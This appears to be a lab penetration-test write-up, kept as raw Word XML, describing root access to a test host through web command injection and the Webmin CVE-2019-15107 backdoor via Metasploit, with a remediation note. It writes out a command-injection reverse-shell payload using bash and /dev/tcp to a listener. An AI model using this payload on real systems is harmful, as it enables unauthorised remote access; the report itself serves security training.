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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Merriweather" w:cs="Merriweather" w:eastAsia="Merriweather" w:hAnsi="Merriweather"/>
          <w:color w:val="1f497d"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l6k5lpnp66ci" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Merriweather" w:cs="Merriweather" w:eastAsia="Merriweather" w:hAnsi="Merriweather"/>
          <w:color w:val="1f497d"/>
          <w:sz w:val="74"/>
          <w:szCs w:val="74"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bifur Report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Merriweather" w:cs="Merriweather" w:eastAsia="Merriweather" w:hAnsi="Merriweather"/>
          <w:color w:val="1f497d"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6dd52n413fxq" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authors: Jude Lindale</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During this assessment, the task was to obtain root access. Upon initial scan and interaction with the target it became apparent that there was an interactive interface; in which allows users to submit queries and obtain certain information. The page allowed for command inject allowing for a reverse shell. With the reverse shell the point of escalation can be found in the /user/local directory. There is a file called webmin and the version of this application is vulnerable. Using</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploit to create the same type of shell in conjunction with a proxy webmin can be exploited using an exploit called webmin_backdoor which is used to gain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>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spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP Address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line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ports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spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0.5.24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spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">80, 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Title:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2019-15107 EDB-ID:47230</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability description: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When the webmin admins password expiration policy is enabled, it allows the attacker to append the shell by using the “|” character inside an HTTP request to the webmin server. In this case the web page has options which allowed for a command to be added to the  html code to connect to a nc listener.</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Fix: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update Webmin to the latest version, and disable “password expiration policy” if not needed.</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>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t xml:space="preserve">CVE: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/cve-2019-15107</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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t xml:space="preserve">Webmin backdoor: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/cncf/tag-security/blob/main/supply-chain-security/compromises/2019/webmin-backdoor.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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t xml:space="preserve">MetaSploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/webmin_backdoor</w:t>
        </w:r>
      </w:hyperlink>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The use of nmap in the image below shows that ports 22 and 80 are open as well as the use of nginx, OpenSSH and FreeBSD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3581400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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94360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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtaining Foothold:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Below shows the starting of a netcat listener on port 8000, this listener is then used to connect with the target application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2695575" cy="866775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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2695575" cy="866775"/>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t xml:space="preserve">By adding “;bash -c 'bash -i &gt;&amp; /dev/tcp/10.0.17.64/8000 0&gt;&amp;1'” and pressing the select button on the application, the web application connects to the netcat listener and allowing the use of a reverse shell. Once the page has finished loading a 504 gateway time-out.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
